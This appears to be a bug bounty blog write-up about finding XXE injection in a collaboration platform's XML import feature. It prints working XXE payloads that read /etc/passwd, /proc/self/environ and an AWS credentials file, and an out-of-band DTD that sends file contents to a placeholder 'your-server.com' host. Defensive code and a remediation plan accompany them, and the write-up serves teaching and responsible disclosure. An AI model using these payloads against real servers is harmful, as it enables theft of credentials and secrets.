MARCH 5, 2026 — PREYANSH SHAH

The XML File That Read Their Server's /etc/passwd

An XXE injection buried inside a document import feature. I uploaded an XML file. Their server read its own filesystem back to me. Then I found the AWS credentials file.

Most people think about file uploads in terms of what you can put on a server.

Malicious PHP script. Webshell. Executable binary. The classic move: upload something that runs.

I think about file uploads in terms of what you can read from a server.

Because sometimes — when the server parses the file you uploaded, rather than just storing it — you can make it read files it absolutely should not be reading. And return their contents to you. Directly. In the response.

That’s XML External Entity injection. And this is the story of how a “harmless” document import feature became a direct window into their production server’s filesystem.

Including the part where I found a .aws/credentials file.

What Is XXE And Why Does XML Keep Causing Problems

XML is a document format from the late 1990s that never quite died despite everyone wishing it would.

It’s used in: Microsoft Office documents (DOCX, XLSX are ZIP files containing XML), SAML authentication tokens, SVG files, RSS feeds, API requests from legacy enterprise systems, and a thousand other places you’d rather not think about.

One of XML’s “features” is something called external entities. The XML spec allows you to define a reference to an external resource — a URL or a file path — and have the parser substitute its contents inline when processing the document.

This was designed for things like: “include the contents of this DTD file” or “reference this shared schema.” Legitimate use cases that made sense in 1998.

The security implication: if a server parses XML you control, and external entity processing is enabled, you can define an entity that points to any file the application process can read. The parser reads the file and substitutes it into the XML. If the application echoes any of the parsed content back, the file contents come back with it.

You’ve just read an arbitrary file. Without touching the filesystem directly. Without executing any code. Just by uploading a specially crafted XML document.
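To make the substitution step concrete, here is a minimal Python sketch using an internal entity, which is harmless because its replacement text lives inside the document itself. The entity name greeting and the function expand_internal_entity are made up for illustration. An external entity goes through the same substitution step, except the replacement text comes from a file or URL that the parser fetches.

```python
import xml.etree.ElementTree as ET

# Hypothetical demo document: the entity "greeting" is declared inline,
# so nothing outside this string is ever read.
DOC = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY greeting "hello from an entity">
]>
<note>&greeting;</note>"""


def expand_internal_entity(document: str) -> str:
    """Parse the document and return the root element's text after substitution."""
    root = ET.fromstring(document)
    return root.text or ""


if __name__ == "__main__":
    # The parser has already replaced &greeting; by the time we read the text.
    print(expand_internal_entity(DOC))
```

The application code never asks for the entity to be expanded. The parser does it on its own, which is exactly why the external variant is so easy to miss.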

The Target

Redacted-workspace.com — a project management and document collaboration platform. Think Notion meets Confluence. Enterprise clients, likely holding sensitive internal documentation.

The feature that caught my attention: “Import Document.”

You could import documents from various formats to create new pages in your workspace. Supported formats included DOCX, XLSX, and — crucially — raw XML.

When you import a DOCX or XLSX file, the server is parsing XML under the hood, because those formats are ZIP archives of XML files. When you import raw XML directly, the server is parsing XML you control.
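If the "DOCX is just XML in a ZIP" claim sounds abstract, this Python sketch shows the idea. It builds a tiny stand-in archive in memory (not a valid Word document, only two of the member names a real DOCX typically contains) and lists the XML parts an importer would have to parse. The helper names make_fake_docx and xml_members are my own.

```python
import io
import zipfile


def make_fake_docx() -> bytes:
    """Build a stand-in archive with DOCX-style member names (not a valid document)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
    return buffer.getvalue()


def xml_members(archive_bytes: bytes) -> list[str]:
    """Return the names of XML parts inside a ZIP-based document."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        return sorted(name for name in archive.namelist() if name.endswith(".xml"))


if __name__ == "__main__":
    for name in xml_members(make_fake_docx()):
        print(name)
```

Every one of those parts is attacker-supplied XML once someone uploads the file, so the parser settings matter for Office imports just as much as for raw XML.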

The question: did they disable external entity processing in their XML parser?

The answer, spoiler: no.

Building the Payload

An XXE payload is a crafted XML file that defines an external entity pointing at a resource you want to read. The simplest possible version:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

What this does: defines an XML entity called xxe that references the file /etc/passwd. When the parser processes the document, it substitutes the contents of /etc/passwd wherever &xxe; appears.

If the server returns any of the parsed XML content in its response — an error message, a preview, a parsed representation — the file contents come with it.

I uploaded this file to the document import feature.

The server processed it. Returned a document preview with the import results.

In the preview, under the <data> element, were the contents of /etc/passwd.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

I sat back and looked at my screen.

The server had just read its own /etc/passwd and sent it to me. Inside a document preview. As casually as returning a JSON response.

Going Deeper: What Else Can I Read

/etc/passwd is the classic XXE proof-of-concept because it exists on every Linux system and is readable by all users. It’s not particularly sensitive on modern systems — password hashes are in /etc/shadow, which is restricted. But it confirms the vulnerability is real.
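For anyone who has not looked closely at the format: each /etc/passwd line has seven colon-separated fields, and an x in the second field means the password hash lives in /etc/shadow instead. A small Python sketch of that layout follows. PasswdEntry and parse_passwd_line are illustrative names, not part of any tool I used.

```python
from typing import NamedTuple


class PasswdEntry(NamedTuple):
    name: str
    password: str  # "x" means the hash is stored in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd_line(line: str) -> PasswdEntry:
    """Split one /etc/passwd line into its seven fields."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError(f"expected 7 fields, got {len(fields)}")
    name, password, uid, gid, gecos, home, shell = fields
    return PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell)


if __name__ == "__main__":
    entry = parse_passwd_line("root:x:0:0:root:/root:/bin/bash")
    print(entry.name, entry.uid, entry.shell, "hash in shadow:", entry.password == "x")
```

What an attacker gets from this file is account names, home directories, and shells. Useful for guessing further paths, but not credentials.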

Now the question: what else is readable?

I started systematically. Server configuration files. Application config. Environment files.

<!ENTITY xxe SYSTEM "file:///etc/hosts">

Got /etc/hosts. Internal hostnames. I could see their internal service naming convention — gave me a map of their microservice architecture.

<!ENTITY xxe SYSTEM "file:///proc/self/environ">

/proc/self/environ on Linux exposes the environment variables the current process was started with. That makes it extremely useful, because applications often load secrets into environment variables.

What came back:

DATABASE_URL=postgresql://app_user:REDACTED@internal-db.redacted-workspace.com:5432/production
REDIS_URL=redis://:REDACTED@internal-cache.redacted-workspace.com:6379
SECRET_KEY=REDACTED
AWS_ACCESS_KEY_ID=AKIA...
AWS_SECRET_ACCESS_KEY=REDACTED
AWS_DEFAULT_REGION=us-east-1
STRIPE_SECRET_KEY=sk_live_...
SENDGRID_API_KEY=SG....

I’m redacting the actual values because obviously. But the format is exactly what you see above.

Database credentials. Redis credentials. Application secret key. AWS access key and secret. Stripe live key. SendGrid key.

All of it. In environment variables. Returned to me via an XML entity.
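If you want to see what your own service would hand over through this path, here is a defensive Python sketch. Entries in the raw file are separated by NUL bytes rather than newlines, so the parser splits on those. The name pattern in SECRET_HINT is my own rough heuristic, not an established rule, and the function only reports variable names, never values.

```python
import re

# Rough, assumed heuristic for "this name probably holds a secret".
SECRET_HINT = re.compile(r"KEY|SECRET|TOKEN|PASSWORD|URL", re.IGNORECASE)


def parse_environ(raw: bytes) -> dict[str, str]:
    """Parse the NUL-separated NAME=value format used by /proc/<pid>/environ."""
    env: dict[str, str] = {}
    for entry in raw.split(b"\0"):
        name, sep, value = entry.partition(b"=")
        if sep:  # skip empty or malformed entries
            env[name.decode(errors="replace")] = value.decode(errors="replace")
    return env


def secret_like_names(env: dict[str, str]) -> list[str]:
    """Return variable names that look like they hold credentials."""
    return sorted(name for name in env if SECRET_HINT.search(name))


if __name__ == "__main__":
    # Linux only: inspect the environment this very process was started with.
    with open("/proc/self/environ", "rb") as handle:
        print(secret_like_names(parse_environ(handle.read())))
```

Run it inside the same container or service account as the application. Anything it prints is something a file-read bug in that process can reach.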

I stopped reading immediately. Closed the file. Opened a new document and started writing the report.

The AWS Credentials File

Before I stopped, I checked one more path out of habit:

<!ENTITY xxe SYSTEM "file:///home/app/.aws/credentials">

The standard location for AWS credentials files when they’re stored on disk rather than in environment variables.

It returned:

[default]
aws_access_key_id = AKIA...
aws_secret_access_key = ...

Different credentials from the environment variable ones. Two sets of AWS credentials. Both accessible via XXE.
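The credentials file is INI-formatted, with one section per profile. As a defensive sketch, this Python snippet lists which profiles and key names such a file contains without printing any values, which is handy when checking whether an application host has long-lived keys sitting on disk. The sample text and the function name profile_key_names are invented for illustration.

```python
import configparser

# Invented sample in the same shape as a credentials file; values are placeholders.
SAMPLE = """[default]
aws_access_key_id = PLACEHOLDER_ID
aws_secret_access_key = PLACEHOLDER_SECRET
"""


def profile_key_names(text: str) -> dict[str, list[str]]:
    """Map each profile name to the key names it defines, never the values."""
    # interpolation=None so a literal '%' in a secret cannot break parsing.
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    return {section: sorted(parser[section].keys()) for section in parser.sections()}


if __name__ == "__main__":
    print(profile_key_names(SAMPLE))
```

If this reports anything on a production application host, it is worth asking whether the workload could use short-lived role credentials instead of a file.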

I don’t know which IAM user these belonged to, what permissions they had, or what they could access. I didn’t find out. I closed the terminal.

I had /etc/passwd, /proc/self/environ, internal hostnames, and the AWS credentials file path confirmed as readable. That was more than enough for a Critical finding. Everything beyond that was unnecessary and irresponsible.

Out-of-Band XXE: When the Server Doesn’t Return the Response

I want to document something important for the writeup because this is a technique that matters in real-world XXE hunting.

In this case, the server returned the parsed XML content in the response. That’s called in-band XXE — the data comes back directly. It’s the easiest case.

But many XXE vulnerabilities are blind — the server parses the XML, but the response doesn’t contain any of the parsed content. Just a success message, or nothing at all.

For blind XXE, you need out-of-band exfiltration. The technique:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://your-server.com/evil.dtd">
  %dtd;
]>
<root>&send;</root>

Your evil.dtd on your server defines an entity that makes the target server send the file contents to you via HTTP:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-server.com/?data=%file;'>">
%all;

The target server parses your XML, fetches your DTD, and builds the send entity with the file contents embedded in its URL. When the parser resolves &send;, it requests that URL from your server, and the file contents land in your request logs.
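The nesting is the confusing part, so here is a string-level simulation in Python of what the parser does with the parameter entities. It is not a parser and touches neither the network nor the filesystem. The function name and the sample file contents are assumptions made for this sketch.

```python
# The replacement text of %all; from evil.dtd, copied from the example above.
ALL_VALUE = "<!ENTITY send SYSTEM 'http://your-server.com/?data=%file;'>"


def expand_parameter_entities(text: str, parameter_entities: dict[str, str]) -> str:
    """Replace each %name; reference with its value, as a DTD processor would."""
    for name, value in parameter_entities.items():
        text = text.replace(f"%{name};", value)
    return text


if __name__ == "__main__":
    # Pretend %file; resolved to this single line (made-up stand-in content).
    declaration = expand_parameter_entities(ALL_VALUE, {"file": "root:x:0:0"})
    print(declaration)
```

The output is an ordinary entity declaration whose URL already contains the file data. Resolving &send; in the document body is what triggers the outbound request.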

It’s indirect. It requires your own infrastructure. But it works even when the server returns nothing to you. I didn’t need this technique here — but knowing it exists is what separates someone who finds XXE from someone who gives up when the direct payload doesn’t work.

The Report

At this point I had been testing for about ninety minutes. The report took another two hours because I wanted it to be airtight.

Title: XXE Injection via Document Import Feature — Arbitrary Server Filesystem Read Including Environment Variables, Database Credentials, and AWS Credentials

Severity: Critical

CVSS: 9.9

Impact: The XML import parser has external entity processing enabled, allowing an attacker to read arbitrary files from the server’s filesystem that are accessible to the application process. Demonstrated reads include: /etc/passwd (user account information), /etc/hosts (internal network topology), /proc/self/environ (full process environment including database credentials, application secrets, AWS credentials, Stripe live API key, and SendGrid API key), and /home/app/.aws/credentials (additional AWS IAM credentials stored on disk).

The combined impact of this vulnerability includes: read access to any file readable by the application process, exposure of all secrets stored in environment variables, exposure of production database credentials, exposure of AWS IAM credentials with unknown permissions, and exposure of third-party payment and email API keys.

Steps to Reproduce:

Create an XML file with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>

Upload via the Document Import feature. Observe /etc/passwd contents in the document preview response.

Evidence: Full HTTP request/response pairs for each file read. Redacted screenshots showing the structure of returned data (actual credential values replaced with REDACTED in all submitted evidence).

Remediation:

Immediate: disable the XML import feature until patched
Immediate: rotate ALL credentials exposed via /proc/self/environ and /home/app/.aws/credentials — treat as fully compromised
Short-term: disable external entity processing in the XML parser (one configuration flag in virtually every XML library)
Medium-term: audit all other XML parsing in the application (DOCX/XLSX import, any XML API endpoints)
Architectural: secrets should be managed via a secrets manager, not environment variables in the process — environment variables are readable via multiple attack vectors beyond XXE
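For the short-term fix, the exact flag depends on the parser, and I don't know which library this target used. As one hedged illustration in Python using only the standard library, the sketch below takes the strictest route and refuses any document that declares a DOCTYPE at all, since an import feature rarely needs one. DoctypeForbidden and parse_untrusted_xml are names I made up. In real Python projects the third-party defusedxml package is a common choice for the same job.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when an uploaded document contains a DOCTYPE declaration."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, rejecting any DOCTYPE up front."""

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in uploads")

    # First pass: a bare expat parser whose only job is to spot a DOCTYPE.
    # Without a DOCTYPE there is nowhere to declare an entity at all.
    probe = expat.ParserCreate()
    probe.StartDoctypeDeclHandler = forbid_doctype
    probe.Parse(data, True)

    # Second pass: the document is DOCTYPE-free, so build the tree normally.
    return ET.fromstring(data)


if __name__ == "__main__":
    print(parse_untrusted_xml(b"<root><data>hi</data></root>").findtext("data"))
```

Parsing twice is wasteful but keeps the sketch short. The design point is to reject the feature outright instead of trying to filter out dangerous paths.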

Their Response: The One I’ll Remember

The triage response came in forty minutes. Critical confirmed.

But what happened over the next twelve hours is worth documenting because it was genuinely impressive and a little stressful to watch.

Hour 1: Import feature disabled.

Hour 2: I received a message from their Head of Engineering — not security, engineering — asking me to confirm exactly which file paths I had read and whether I had attempted to use any credentials. I provided full documentation of every path I’d read. Confirmed no credential use.

Hour 3: Emergency credential rotation begins. They sent me a list of services they were rotating. Database passwords. Application secrets. AWS IAM keys. Stripe key. SendGrid key. The AWS keys were for an IAM user with broad S3 and EC2 permissions. The Stripe key was their live production key — they had to rotate it, which would briefly disrupt any active Stripe webhook processing.

Hour 6: They sent a message saying the Stripe key rotation had caused a 23-minute disruption to webhook processing, which had to be manually reconciled for about 340 transactions. Not catastrophic. But real operational impact from rotating credentials that should never have been exposed.

Hour 8: XML parser reconfigured with external entities disabled. DOCX and XLSX import re-enabled with additional parsing sandbox. Raw XML import feature permanently removed — they decided it was unnecessary and the risk wasn’t worth it.

Hour 12: Full retest requested. I uploaded the original payload. Server returned an XML parsing error — external entities blocked. Confirmed remediated.

Bounty: $$$$

They also sent a message saying the credential rotation was their most complex emergency response in two years and they appreciated the detailed documentation of exactly what had been accessed. The difference between a vague “I found XXE” report and a precise “here is every file path I read and here’s what was in each one (redacted)” report is the difference between a panicked all-hands rotation and a targeted, efficient one.

Documentation is not a courtesy. It’s part of the job.

Why XML Parsers Still Have This Enabled By Default

This is the question I always get when I explain XXE to developers.

“Why would any parser have external entity processing enabled by default? That seems insane.”

Historical reasons. External entities were a legitimate XML feature in 1998. Parsers enabled them by default because the spec said they should. Security implications weren’t understood yet.

Modern parser libraries have options to disable them. The problem: the default is often still “enabled” for backward compatibility. Developers who don’t know about XXE don’t know to turn off external entities. So they import an XML parsing library, use it with default settings, and ship a critical vulnerability without writing a single insecure line of code.

The fix is a one-line configuration change. But you have to know to make it.

If you write code that parses XML, right now, go check if external entity processing is disabled. I’ll wait.
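Here is one way to do that check, as a Python sketch under my own assumptions. It writes a canary string to a temporary file, points an external entity at it, and reports whether the canary shows up in whatever your parsing code returns. The canary value and the function names are arbitrary. stdlib_etree is only an example adapter for Python's built-in ElementTree.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Callable

CANARY = "xxe-canary-7f3a"  # arbitrary marker string chosen for this sketch


def leaks_external_entity(parse_to_text: Callable[[bytes], str]) -> bool:
    """Return True if the parser under test resolves a file:// external entity."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    try:
        with os.fdopen(fd, "w") as handle:
            handle.write(CANARY)
        payload = (
            '<?xml version="1.0" encoding="UTF-8"?>'
            f'<!DOCTYPE r [<!ENTITY probe SYSTEM "{Path(path).as_uri()}">]>'
            "<r>&probe;</r>"
        ).encode("utf-8")
        try:
            return CANARY in parse_to_text(payload)
        except Exception:
            # A parser that rejects the document did not leak the file.
            return False
    finally:
        os.unlink(path)


def stdlib_etree(payload: bytes) -> str:
    """Example adapter: parse with ElementTree and serialize the result."""
    return ET.tostring(ET.fromstring(payload), encoding="unicode")


if __name__ == "__main__":
    print("leaks:", leaks_external_entity(stdlib_etree))
```

Swap stdlib_etree for a thin wrapper around the parser and settings your application actually uses, and run it in CI so a future configuration change can't quietly turn the feature back on.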

The Moment That Stuck With Me

When I read /proc/self/environ and saw STRIPE_SECRET_KEY=sk_live_... scroll across my terminal — that was the moment.

Not because of what I could do with it. I wasn’t going to do anything with it.

But because sk_live_ means production. Not staging. Not test. The live Stripe secret key that processes real payments from real customers was sitting in an environment variable, readable by an XML parser, fetchable by anyone who knew to upload a three-line XML file.

Storing production secrets in environment variables is so common it’s practically industry standard. It’s considered “better than hardcoding.” And it is. But it’s not good enough. Not when your application parses attacker-controlled XML, or renders attacker-controlled HTML, or does any of a dozen other things that can expose the process environment.

Secrets managers exist. Use them.

Closing

I’ve found bigger bounties. I’ve spent more hours on harder bugs.

But XXE is the one I use when I want to explain to someone why application security is genuinely difficult. Not because the attack is complicated — it isn’t. Three lines of XML. But because it requires knowing that XML parsers have this behavior, that it’s enabled by default, that /proc/self/environ is a valid file path, that environment variables contain secrets, that all of these things connect into a chain that leads from “upload a document” to “read production Stripe keys.”

The attack is simple. The knowledge required to find it is not.

That’s what this blog is for.

Reported through the official bug bounty program. File reads were limited to the paths documented above. No credentials were used, stored, or shared. Redacted copies of all evidence were shared with the program team. Domain redacted per responsible disclosure norms.
